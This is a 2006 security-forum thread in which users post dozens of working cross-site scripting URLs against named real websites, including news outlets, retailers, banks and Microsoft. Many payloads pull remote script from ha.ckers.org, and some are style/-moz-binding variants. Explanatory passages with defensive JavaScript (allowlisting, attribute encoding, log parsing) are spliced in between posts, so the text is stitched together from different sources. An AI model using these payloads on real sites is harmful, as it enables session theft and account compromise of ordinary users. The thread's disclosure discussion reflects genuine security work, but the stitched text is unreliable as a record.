Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 15 of 65
Re: So it begins
Posted by: cheng
Date: October 02, 2006 12:17AM

It's interesting, Rsnake.
chinatelecom is not that professional company, although it monopolizes telecom markets in China.
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www2.chinatelecom.com.cn/send/mailtopresident.php&m_name=%22%3E%3E%3Cscirpt%3Ealert()%3C/scritp%3C

btw, how long do companies like trustE, paypal need to fix their holes?

Re: So it begins
Posted by: thomaspollet
Date: October 02, 2006 03:20AM

>btw, how long do companies like trustE,paypal need to fix their holes?

paypal takes too long, last hole I reported took more than a week and several mails to get fixed.
They don't have a 'standard' security@ mail-address, they don't monitor public mailing lists. In short, they suck at securing their customers.
http://www.paypal.com/cgi-bin/webscr?cmd=_security-center-outside <-- full of shit

Re: So it begins
Posted by: WhiteAcid
Date: October 02, 2006 06:30AM

The last paypal flaws that were posted here I promptly forwarded on to Gadi Evron (he runs securiteam, several mailing lists, ZERT and other things) who I think called them up and let them know, at least he let them know pretty damn quick, he's the kind of guy to have that leeway. I should be able to repeat the process if any of you find any XSSes on similar sites.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: eMole
Date: October 02, 2006 01:29PM

http://www.ircspy.com/search.asp

Search accepting simple XSS queries:
"><script>alert('hi admin'); document.location="http://www.google.de";</scriPT>

Posting a prepared link in the forum would give us success:
http://www.ircspy.com/search.asp?searchtext=%22%3E%3Cscript%3Ealert%28%27hi+admin%27%29%3B+document.location%3D%22http%3A%2F%2Fwww.google.de%22%3B%3C%2FscriPT%3E&pgform=Submit

Since the password is plaintext in the cookie, it's a piece of cake...

Status:
-Admin PMed
-fixed

Re: So it begins
Posted by: maluc
Date: October 02, 2006 02:15PM

http://sitesearch.websidestory.com/?q=XSS+holes%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=0&y=0

Their script, which I see on several websites, is usually vulnerable as well _-_

mostly news sites

-maluc

Re: So it begins
Posted by: maluc
Date: October 02, 2006 02:28PM

this one affecting the script they sell

http://sitesearch.websidestory.com/?q=%27%29%3Balert%28%27XSS%27%29%3Beval%28%27&x=0&y=0

which you should find in most sites that use it (not always needing to escape parenthesis)

however, some such as breach.com have secured it.

-maluc

Re: So it begins
Posted by: maluc
Date: October 02, 2006 03:01PM

https://ftn.fedex.com/app/quickfind/QuickFindAction_en.jsp?masterBill=XSS%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

-maluc

Re: So it begins
Posted by: yawnmoth
Date: October 02, 2006 03:26PM

http://www.compsource.com/keywordresult_next.asp?keyword_list=%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E

This one converts the keyword_list variable to uppercase (meaning s.js won't be found), outputs an error message whenever ('s are used, and drops all characters after # (or rather, %23).

So XSS works... I'm just not sure it's demonstrable without hosting a new *.JS file...

Re: So it begins
Posted by: rsnake
Date: October 02, 2006 04:49PM

Hi, Cheng... you know that's a tough question... generally my feeling is 2-4 weeks is the upper limit on how long it should take (any) company to fix an XSS hole, given that it takes X time to get the report, X time to verify it, X time to secure the resources, X time to fix it, X time to build the release, X time to test the release (regress and otherwise) and X time to release it.

Most companies should really be able to do it in far less time. However, most of the companies we are talking about here fit into the first category where the release cycles are mandated and slow (because we generally only report on larger websites). To add another issue, there may be some contractual obligations or auditing standard requirements that won't let certain companies release during "busy" seasons. I've seen that happen in a number of companies (especially online retailers).

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: October 02, 2006 06:11PM

This is not from me but from one of our lurkers (what can I say? We have some kick-ass lurkers here):

USA Today
http://stocks.usatoday.com/custom/usatoday-com/html-story.asp?guid='%7B60C3EDF9-51F0-40D3-A9FE-9CAAAD9F135E%7D

Los Angeles Times
http://markets.latimes.com/custom/tribune-interactive/html-headlines.asp?symb=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

Washington Post
http://forums.washingtonpost.com/dir-app/bbcard/profile_center.asp?webtag=wpforums&cType=2&uName=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&dMode=0&eBtn=0&uid=321890205

Chicago Tribune
http://markets.chicagotribune.com/custom/tribune-interactive/html-headlines.asp?symb=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

New York Times
http://realestate.nytimes.com/+ComShare/photoimage.asp?Lid=459-381991&LType=U%22><script%20src=%22http://ha.ckers.org/s.js%22></script>

Kansas City Star
http://weather.kansascity.com/auto/kansascity/radar/mixedcomposite.asp?region=%22><script%20src=%22http://ha.ckers.org/s.js%22></script>

Boston Globe
https://bostonglobe.com/subscriber/offer/go/zipnodel.asp?zip=<script%20src=%22http://ha.ckers.org/s.js%22></script>

New York Post
http://www.nypost.com/search/search.htm?q=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&s=news&t=0

The Washington Times
http://washingtontimes.com/blogs/storyview.php?StoryID=20060502-025032-6098r&TopicsID=t%22><script%20src=http://ha.ckers.org/s.js></script>

ABC
http://app.abc.go.com/keyword/searchResults?search=%22><script%20src=%22http://ha.ckers.org/s.js%22></script>

CBS
http://cgi.cbs.com/feedback/make_form.cgi?name=F%22><script%20src=%22http://ha.ckers.org/s.js%22></script>&email=ftn@cbsnews.com&affiliate=network

Warner Brothers
http://www2.warnerbros.com/web/all/link/partner.jsp?url=javascript:alert('XSS')

PetCo
https://secure.petco.com/Content/HelpPopup.aspx?PC=helppopup&ID=x'),%20alert('XSS

PetSmart
http://www.petsmart.com/global/product_detail.jsp?PRODUCT%3C%3Eprd_id=845524441775473&FOLDER%3C%3Efolder_id=2%22><img%20src=%22foo%22%20onerror=%22alert('XSS')%22>

Warner Brothers Store
http://www.wbshop.com/search/?keywords1='>%0a</script>%0a<script%20src=%22http://ha.ckers.org/s.js%22></script>

Sony Music Store
http://www.sonymusicstore.com/store/catalog/TalentDetails.jsp?talentId=209093XXXXX%22><script%20src=%22http://ha.ckers.org/s.js%22></script>

Nike
http://www.nike.com/nikewomen/index.jsp?skipflashdetection=true&skipflashdetection=X%0a</script><script>alert('XSS')</script>

cafepress
http://www.cafepress.com/buy/aa%3Cimg%20src=foo%20onerror=alert('XSS')%3E/-/cfpt2_/copt_/cfpt_361:fHBa__DB_________bSH_P___D/source_searchBox/x_0/y_15

GNC
http://www.gnc.com/searchHandler/index.jsp?keywords=a%22%3E%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E&query=&x=0&y=0&change_search=products

Shop NBC
http://www.shopnbc.com/searchm/?page=LIST&free_text=%22%3E%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E&BreadCrumb=free_text

Linens N Things
http://www.lnt.com/search/noResults.jsp?kw=%22%3E%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E

Netgear
https://www.buynetgear.com/checkoutnew.asp?Section=CHECKOUT_1&shopper=new&billing_country=US&shopper_email=%22%3E%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E&shopper_email_confirm=&shopper_password=&shopper_password_confirm=&Action.x=154&Action.y=10

Fingerhut
http://www.fingerhut.com/search.aspx?searchstring=%3Cscript%20src=%22http://ha.ckers.org/s.js%22%3E%3C/script%3E&cxid=4

Armani Exchange
http://www.armaniexchange.com/shopping/searchV2/search2.jsp?go=1&code=nav_search&prodname=X%0a%0a%3C/script%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E

Ritz Camera
http://www.ritzcamera.com/webapp/wcs/stores/servlet/MapQuestView?storeId=10001&catalogId=10001&languageId=-1&city=%22%3E%3Cimg%20src=foo%20onerror=alert('XSS');%3E%0a&state=&zipCode=

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: October 02, 2006 06:15PM

well that's certainly impressive.. keep up the good work

-maluc

Re: So it begins
Posted by: unsticky
Date: October 02, 2006 06:36PM

Edit (Again):
I've removed the wiki header redirect, because I found it's actually a bug in the wiki script itself, and I'm going to move to report it.

Edit:
Haha. Just found this one..
[www.fbi.gov]



Edited 2 time(s). Last edit at 10/02/2006 07:45PM by unsticky.

Re: So it begins
Posted by: maluc
Date: October 02, 2006 07:27PM

lol, love the FBI one..

and here is an interesting one.. it includes the registration form processor as a variable. Instead of just routing to it, however, the current asp page submits a POST to it and echoes the output back to the page. Thus, instead of being a redirect, it loads the page under the same origin.

http://www.adidas.com/scripts/cud/cud.asp?call=registeremail&Postprocessor=http://tinyurl.com/jsfzv&dateofbirth_dd=1&dateofbirth_mm=1&dateofbirth_yyyy=1
routed through tinyurl, to change the POST to GET.

-maluc
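The adidas page maluc describes takes the address of its form processor from a request parameter and fetches it server-side, then echoes the result under its own origin. The following is an added example (not the site's code, nor maluc's) of the check a defender would put in front of such a fetch: resolve the parameter against the application's own origin and accept only an exact allowlist of handler paths. The base origin and the allowlisted paths are constructed for the example.

```javascript
// Added example, not the site's code: validating a "next handler" URL
// parameter before the server fetches it. Origin and allowlist are constructed.

const BASE_ORIGIN = 'https://www.example.com';              // constructed
const ALLOWED_PROCESSORS = new Set([                         // constructed allowlist
  '/scripts/cud/registeremail.asp',
  '/scripts/cud/unsubscribe.asp',
]);

// Returns the absolute URL the server may POST to, or null when the parameter
// must be rejected. Rebuilding the URL from origin + pathname (instead of
// forwarding the raw parameter) also drops any query string or fragment.
function resolvePostprocessor(param) {
  if (typeof param !== 'string' || param.length === 0 || param.length > 512) return null;

  let url;
  try {
    // Relative paths resolve against our own origin; absolute URLs keep theirs.
    url = new URL(param, BASE_ORIGIN);
  } catch (e) {
    return null;
  }

  // Anything that would send the server to another host or scheme is refused:
  // other origins, protocol-relative '//host/...', javascript:, file:, and so
  // on. A redirector such as the tinyurl link above fails this check as well.
  if (url.origin !== BASE_ORIGIN) return null;
  if (url.username !== '' || url.password !== '') return null;

  // Exact match on the normalised path ('..' segments are already collapsed).
  if (!ALLOWED_PROCESSORS.has(url.pathname)) return null;

  return url.origin + url.pathname;
}

// Stand-alone demonstration with a mix of accepted and rejected inputs.
const demoInputs = [
  '/scripts/cud/registeremail.asp',
  '/scripts/cud/../cud/registeremail.asp?x=1#frag',
  'http://tinyurl.com/jsfzv',
  '//evil.example/scripts/cud/registeremail.asp',
  'javascript:alert(1)',
  '/scripts/cud/other.asp',
];
for (const input of demoInputs) console.log(input, '->', resolvePostprocessor(input));
```

The point of the allowlist is that the server never follows a caller-chosen address at all: the parameter only selects among handlers the application already knows, so neither a redirector nor a protocol-relative URL can pull in foreign content to be echoed under the site's origin.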

Re: So it begins
Posted by: digi7al64
Date: October 02, 2006 09:12PM

Found this
http://techfinder.theinquirer.net/vnuinquirer/SearchServlet?ksAction=Search&col=vnulive&rf=0&srchtype=key&stype=&bi=1&ei=0&oq=qt%3A%2522%2Bonmouseover%253Dalert%2528%2527moo%2527%2529%253B@@col%3Avnulive@@type%3Akey@@ptype%3A@@sgroup%3A@@rf%3A0@@tax%3A0@@providerid%3A0@@ssn%3A0@@sid%3A10008348114@@datasource%3AVNUINQUIRER@@bi%3A1%7E%7E&vf=&tId=&sId=10008348114&sSeq=1&regId=&lsTime=null&type=kw&isAdv=false&kw=%22onmouseover%3D%22alert%28%27xss%27%29%3B << requires mouseover on search input box

This is the injection:

" onmouseover="alert('xss');

applies to all sites using the http://www.knowledgestorm.com/SearchServlet?ksAction=Search&col=kslive&rf=0&srchtype=key&stype=&bi=1&ei=0&oq=null&vf=null&tId=&sId=&sSeq=1&regId=&lsTime=null&isAdv=false&kw=%22+onmouseover%3D%22alert%28%27xss%27%29%3B&x=14&y=7 product, which at a glance are these sites:


Bank Systems & Technology Research Library
Beverage Industry Research Center
Brand Packaging Research Center
BusinessWeek Technology Solution Finder
Byte.com Research Papers and Reports
Candy Industry Research Center
Channel Web Library
ChannelWeb Product Finder
CommWeb Tech Directory
Computerworld Business Intelligence Guide
Computerworld Buyers' Guide
Computerworld Careers Guide
Computerworld CRM Guide
Computerworld Data Management Guide
Computerworld Development Guide
Computerworld E-business Guide
Computerworld ERP Guide
Computerworld Government Guide
Computerworld Hardware Guide
Computerworld IT Management Guide
Computerworld Mobile & Wireless Guide
Computerworld Networking Guide
Computerworld Operating Systems Guide
Computerworld Outsourcing Guide
Computerworld ROI Guide
Computerworld Security Guide
Computerworld Software Guide
Computerworld Storage Guide
Computerworld Web Site Management Guide
Confectioner Research Center
CRM Buyer
CRMA
CRMindustry.com
CRN Channel Library
CXO America Resource Centre
Dairy Field Research Center
Database Pipeline White Paper Library
Developer Pipeline White Paper Library
Dr.Dobbs Journal Research Center
E-Commerce Times Resource Center
Enterprise Systems
Enterprise Systems White Paper Directory
Flexible Packaging Research Center
Food & Drug Packaging Research Center IT Directory
Fast Company
Forbes
Global Services White Paper Library
Government Computer News
GovernmentEnterprise Vendor Research Library
HR Management Resource Centre
ID Wholesale Distribution Solutions
Inc
InformationWeek White Papers
InfoWorld
Insurance & Technology Research Library
Insurance Journal
Intelligent Enterprise Research Library
InternetWeek Product Finder
InternetWeek White Paper Library
IT Architect Magazine Research Library
IT Business Edge
IT Utility Pipeline White Paper Library
Line56
LinuxInsider Resource Center
Meat & Deli Retailer Research Center
Modern Healthcare
National Provisioner IT Directory
Network Computing Tech Library
Optimize Research Library
Outsourcing Pipeline White Paper Library
Private Label Buyer Research Center
Purchasing.com Technology Finder
Refrigerated & Frozen Foods Research Center
Refrigerated & Frozen Foods Retailer Research Center
RFIDinsights White Paper Library
SC Magazine
Small Business Pipeline Product Finder
Small Business Pipeline White Paper Library
Snack Food & Wholesale Bakery Research Center
Software Magazine
Stagnito's New Products Research Center
StartupJournal.com
SysAdmin Magazine Research Papers and Reports
Tech Decisions White Paper Center
TechNewsWorld Resource Center
TechWeb White Paper Library
UnixReview.com Research Papers and Reports
Wall Street & Technology Research Library
Washington Technology
Windows IT Pro Solution Center

http://search.forbes.com/search/find?action=advancedSearch&start=1&max=20&sort=Relevance&MT=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&pub=forbes.com%2Cmagazine%2Cfyi%2Cbest&author=&tickers=&pubDateStart=mm%2Fdd%2Fyyyy&pubDateEnd=mm%2Fdd%2Fyyyy&contentType=all&storyType=all&premium=on

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: maluc
Date: October 02, 2006 10:23PM

Yes, from what I can see, it affects most if not all of those sites listed.. great find.

I prefer to inject style tags instead though, using the injection:
" style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss);expression(alert('XSS'))"
String.fromCharCode if single quotes are filtered..

example from your list: http://partners.knowledgestorm.com/rff/SearchServlet?ksAction=Search&col=kslive&rf=0&srchtype=key&stype=&bi=1&ei=0&oq=qt%3Aasdf%2527e%2522eee%40%40col%3Akslive%40%40type%3Akey%40%40ptype%3A%40%40sgroup%3A%40%40rf%3A0%40%40tax%3A0%40%40providerid%3A0%40%40ssn%3A0%40%40sid%3A613051320%40%40datasource%3ARFF%40%40bi%3A1%7E%7E&vf=&tId=&sId=613051320&sSeq=1&regId=&lsTime=null&isAdv=false&type=key&kw=asdf%27e%22+style%3D%22-moz-binding%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29;xx:expression(alert(String.fromCharCode(88,83,83)))%22+ which will auto execute in both FF and IE..

-maluc

Re: So it begins
Posted by: digi7al64
Date: October 02, 2006 10:26PM

Thanks for that maluc - I guess I really need to look at different methods for injecting.

http://www.britannica.com/search?query=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&ct=&searchSubmit.x=0&searchSubmit.y=0
http://sitesearch.websidestory.com/?q=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=0&y=0

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 10/02/2006 10:30PM by digi7al64.

Re: So it begins
Posted by: rsnake
Date: October 02, 2006 11:38PM

More from a different lurker than last time (yup, it's confirmed we have cool lurkers). These are his words, not mine:

JC Penney's
http://www2.jcpenney.com/jcp/SearchDepartment.aspx?SearchString=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&JSEnabled=true&submit+search.x=5&submit+search.y=9

Sears
http://www.sears.com/sr/javasr/search.do?BV_UseBVCookie=Yes&vertical=Sears&keyword=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&gobutton.x=9&gobutton.y=15

CBS News
http://www.cbsnews.com/stories/2005/09/26/search/main886284.shtml?source=cbsnews&searchString=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&sort=1&type=all&num=10&offset=0&x=22&y=10

Foley law firm
This probably has to be modified because of the stateful nature of the link. But I'm not smart enough for that.
http://www.foley.com/sitesearch.aspx?__VIEWSTATE=dDwtMTAxNzE5NTIxODt0PDtsPGk8MT47aTwyPjs%2BO2w8dDxwPHA8bDxUZXh0Oz47bDxcPHNwYW4gY2xhc3M9InRleHQxIlw%2BTG9va2luZyBmb3Igc29tZXRoaW5nIHNwZWNpZmljPyBTaW1wbHkgdHlwZSBhIHdvcmQgb3IgcGhyYXNlLCBjaG9vc2UgYSBzaXRlIHNlY3Rpb24gKG9yIGVudGlyZSBzaXRlKSwgdGhlbiBjbGljayB0aGUgU2VhcmNoIGJ1dHRvbi4gUGxlYXNlIGVuY2xvc2UgcGhyYXNlIHNlYXJjaGVzIGluIGRvdWJsZSBxdW90ZXMgZm9yIGdyZWF0ZXIgYWNjdXJhY3kuXDwvc3Bhblw%2BOz4%2BOz47Oz47dDw7bDxpPDU%2BOz47bDx0PHA8bDxUZXh0Oz47bDxcZTs%2BPjs7Pjs%2BPjs%2BPjs%2BgObD42gh%2Ba%2FMi1aqHRdfBrCPKY0%3D&SearchType=1&txtSearch=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&selSection=&submit.x=18&submit.y=6

Findlaw
http://lawyers.findlaw.com/lawyer/lawyer_dir/search/jsp/stdSearch_process.jsp?stype=BY_ADDR_OR_ZIP&target=FIRM&keyword=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&location=chicago%2C+il&Submit=Find+Lawyers%21

A LexisNexis company - lawfirm finder:
http://www.martindale.com/xp/Martindale/Lawyer_Locator/Search_Lawyer_Locator/search_result.xml?PG=0&STYPE=F&FNAME=&LNAME=&FN=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&CN=&STS=1&CRY=1&ratind=&bc=1

Another law firm:
http://www.twobirds.com/english/search/search_results.cfm?srchString=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&search.x=9&search.y=10

A county bank
http://www.boonebank.com/app/search.jsp?searchAction=search&search=glossary&searchglossary=search&searchtext=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E

World Bank
http://web.worldbank.org/external/default/main?menuPK=140710&pagePK=36912&piPK=36916&q=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&theSitePK=4607

Bank Of Ireland
http://www.bankofireland.ie/site-search/htsearch?words=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&Submit=GO

MapQuest
http://www.mapquest.com/maps/map.adp?formtype=address&country=US&popflag=0&latitude=&longitude=&name=&phone=&level=&addtohistory=&cat=%3Cscript%3Ealert%28%27GeeWiz%27%29%3C%2Fscript%3E&address=&city=&state=&zipcode=

Another bank (US branch of a Gaza, Lebanon)
http://www.chfhq.org/section/_search/?search_query=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&x=9&y=8

New York State Banking Department:
http://www.banking.state.ny.us/cgi-bin/AT-HTML_Docssearch.cgi?sp=sp&mode=concept&search=%3Cscript%3Ealert%28%22GeeWiz%22%29%3C%2Fscript%3E&Search.x=83&Search.y=9

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: thomaspollet
Date: October 03, 2006 05:39AM

https://adcenter.microsoft.com/signup.aspx?adv_market=en-us%22;alert(1);s_account=%22&s_int=118

Re: So it begins
Posted by: thomaspollet
Date: October 03, 2006 07:30AM

I have an XSS question:
consider the following HTML injection:
http://moneycentral.msn.com/loan/mortcalc.aspx?Price=%22%20style="background-image:url(javascript:alert(2))">
this results in
<input type="text" value="" style="background-image:url(javascript:alert(2))">
why don't I get a pop-up on the MSN site while the same tag does execute JS in a clean HTML doc?

Re: So it begins
Posted by: WhiteAcid
Date: October 03, 2006 08:33AM

moneycentral.msn: http://moneycentral.msn.com/loan/mortcalc.aspx?Price=%22%20style=%22background-image:url(javascript:alert(2))%22%3E
Does give me an alert (obviously only in IE)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: rsnake
Date: October 03, 2006 10:13AM

Yup, works for me too (in IE). The reason it doesn't work in Firefox is because the JavaScript: directive is not allowed in that context in Firefox. There are only a few places JavaScript: will work in Firefox and CSS just isn't one of them.

- RSnake
Gotta love it. http://ha.ckers.org
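thomaspollet's question and RSnake's answer turn on the attribute context: the Price parameter is reflected verbatim into value="...", so a leading double quote closes the attribute and whatever follows becomes new attributes, and whether the resulting style attribute fires then depends on the browser. The fix does not depend on the browser. Below is an added example (not code from the thread or from the site) that renders that <input> tag in its vulnerable and its hardened form and compares them with a small quote-aware attribute tokenizer; the payload is the one quoted above, the hypothetical templates are constructed.

```javascript
// Added example, not code from the thread: HTML attribute encoding keeps an
// injected value inside value="" regardless of which browser honours
// javascript: inside CSS url(). The payload is the one quoted in the thread.

const SAMPLE_PAYLOAD = '" style="background-image:url(javascript:alert(2))';

// Encode the five characters that can end or alter an HTML attribute value or
// text node. Applied to every untrusted value placed in a quoted attribute.
function encodeHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable rendering (hypothetical template): the parameter is concatenated
// verbatim, so a value starting with '"' closes value="" and starts new attributes.
function renderPriceInputVulnerable(price) {
  return `<input type="text" name="Price" value="${price}">`;
}

// Hardened rendering: identical markup, value passed through the encoder.
function renderPriceInputSafe(price) {
  return `<input type="text" name="Price" value="${encodeHtmlAttr(price)}">`;
}

// Quote-aware tokenizer for the attributes of one start tag. Unlike a text
// search for 'style=', it only reports names that sit outside a quoted value,
// which is how a browser's tokenizer sees the tag.
function parseTagAttributes(tag) {
  const inner = tag.replace(/^<[a-zA-Z][^\s>]*\s*/, '').replace(/\s*\/?>$/, '');
  const attrs = {};
  const re = /([^\s=]+)(?:=(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(inner)) !== null) {
    const value = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : (m[4] || '');
    attrs[m[1].toLowerCase()] = value;
  }
  return attrs;
}

// Names of attributes the rendered tag has that the template never declared.
function gainedAttributes(renderedTag) {
  const expected = new Set(['type', 'name', 'value']);
  return Object.keys(parseTagAttributes(renderedTag)).filter((k) => !expected.has(k));
}

// Stand-alone demonstration.
console.log(gainedAttributes(renderPriceInputVulnerable(SAMPLE_PAYLOAD))); // [ 'style' ]
console.log(gainedAttributes(renderPriceInputSafe(SAMPLE_PAYLOAD)));       // []
```

In the hardened output the whole payload, quotes included, stays the string value of the one value attribute, so there is no style attribute for any browser to evaluate; encoding for the exact context the value lands in (here a quoted attribute) is what makes the result browser-independent.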

Re: So it begins
Posted by: maluc
Date: October 03, 2006 01:29PM

http://walmartstores.com/GlobalWMStoresWeb/search.do?subcatid=316&simplesearchfor=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&x=0&y=0

-maluc

Re: So it begins
Posted by: maluc
Date: October 03, 2006 02:18PM

http://www.target.com/gp/flex/sign-in.html/601-2051186-0950531?&step=new&protocol=%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss');xx:expression(alert('XSS')%29

-maluc

Re: So it begins
Posted by: maluc
Date: October 03, 2006 02:37PM

http://khelp.kohls.com/default.asp?question=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%0D%0A&a=e-faqs-results

-maluc

Re: So it begins
Posted by: maluc
Date: October 03, 2006 06:45PM

http://www.videolan.org/mirror.php?mirror=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&file=

-maluc

Re: So it begins
Posted by: yawnmoth
Date: October 03, 2006 08:10PM

Regarding the lurkers who contribute stuff... it occurs to me that it may be possible to glean some new XSS exploits by looking at this website's server logs, i.e. look at the referer of any calls to http://ha.ckers.org/s.js.

This isn't the source of some of our lurkers, is it?

Re: So it begins
Posted by: thomaspollet
Date: October 04, 2006 04:11AM

http://lifestyle.msn.com/HomeandGarden/BeJane/Article.aspx?cp-documentid=';alert(1);s='nn



Edited 1 time(s). Last edit at 10/04/2006 04:11AM by thomaspollet.

Re: So it begins
Posted by: thomaspollet
Date: October 04, 2006 10:24AM

acunetix :p POST

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://testphp.acunetix.com/search.php?test=query&searchFor=%3Cscript%3Ealert(1)%3C/script%3E

Re: So it begins
Posted by: rsnake
Date: October 04, 2006 10:27AM

yawnmoth - you're exactly right, but I intentionally try not to look at those for two reasons: 1) it would discourage people from using it for testing and 2) it's a lot of garbage mixed in with good stuff. For instance, a few times I've seen people clicking on an actual link taking them to xss.js (rather than actually executing it). There's no (easy) way to know if it's actually been executed or not. But yes, in theory you're right.
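yawnmoth's idea and RSnake's caveat together describe a small log-analysis task: on requests for the probe script, the Referer names the page that loaded it, but a person clicking a plain link to the script also produces a Referer. The following is an added example (not code from the thread, and not the site's own tooling) that parses access-log lines in the common "combined" format, keeps requests for the probe path, and checks whether the referring page's query string carries markup, which is what separates "a page reflected a payload and the browser fetched the probe as a subresource" from a direct click. The log lines are constructed for the example and the probe path is an assumption.

```javascript
// Added example, not from the thread: mining an access log for Referer headers
// on requests to a probe script. Log lines are constructed; the probe path is
// an assumption.

const PROBE_PATH = '/s.js';

// Apache/nginx combined format:
//   host ident user [time] "method path proto" status bytes "referer" "user-agent"
// Quoted fields allow backslash escapes, which Apache emits for embedded quotes.
const COMBINED = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "((?:[^"\\]|\\.)*)" "((?:[^"\\]|\\.)*)"$/;

function parseCombinedLine(line) {
  const m = COMBINED.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]), referer: m[6], userAgent: m[7] };
}

// Percent-decode repeatedly (bounded) so double-encoded payloads such as the
// %2522 forms quoted earlier in the thread are visible to the markup check.
function fullyDecode(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { return cur; }
    if (next === cur) return cur;
    cur = next;
  }
  return cur;
}

// Tokens that only turn up in a query string if someone injected markup into it.
const MARKUP_HINTS = /<script|<img|onerror=|onmouseover=|javascript:|expression\(|-moz-binding/i;

// One record per probe request that carried a Referer. markupInQuery is a
// heuristic, not proof that anything executed: a reflected payload arrives with
// the payload in the referring URL, a direct click on a link to the script
// arrives with an ordinary page URL (rsnake's caveat above).
function findReferringPages(logText) {
  const results = [];
  for (const raw of logText.split('\n')) {
    const rec = parseCombinedLine(raw.trim());
    if (!rec || rec.path !== PROBE_PATH || rec.referer === '-') continue;
    let ref;
    try { ref = new URL(rec.referer); } catch (e) { continue; }
    results.push({
      ip: rec.ip,
      host: ref.hostname,
      path: ref.pathname,
      markupInQuery: MARKUP_HINTS.test(fullyDecode(ref.search)),
    });
  }
  return results;
}

// Constructed sample log: one reflected payload, one direct click, one unrelated hit.
const SAMPLE_LOG = [
  '203.0.113.5 - - [02/Oct/2006:18:11:02 -0700] "GET /s.js HTTP/1.1" 200 31 "http://search.example.net/find?q=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E" "Mozilla/5.0"',
  '203.0.113.9 - - [02/Oct/2006:18:12:40 -0700] "GET /s.js HTTP/1.1" 200 31 "http://forum.example.org/thread?id=1" "Mozilla/5.0"',
  '198.51.100.2 - - [02/Oct/2006:18:13:01 -0700] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
].join('\n');

console.log(findReferringPages(SAMPLE_LOG));
```

Two things limit what this can tell you. As RSnake notes, a hit with a Referer does not prove execution; the markup check only raises or lowers confidence. And the technique depended on browsers of the time sending the full referring URL: current browsers default to a referrer policy that strips the path and query on cross-origin requests, so the same log today would mostly show bare origins.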

Re: So it begins
Posted by: kirke
Date: October 04, 2006 10:53AM

thomaspollet, I guess that's a vulnerability by design, it's the testsite configured by default in WVS, it's simply supposed to be found ;-)
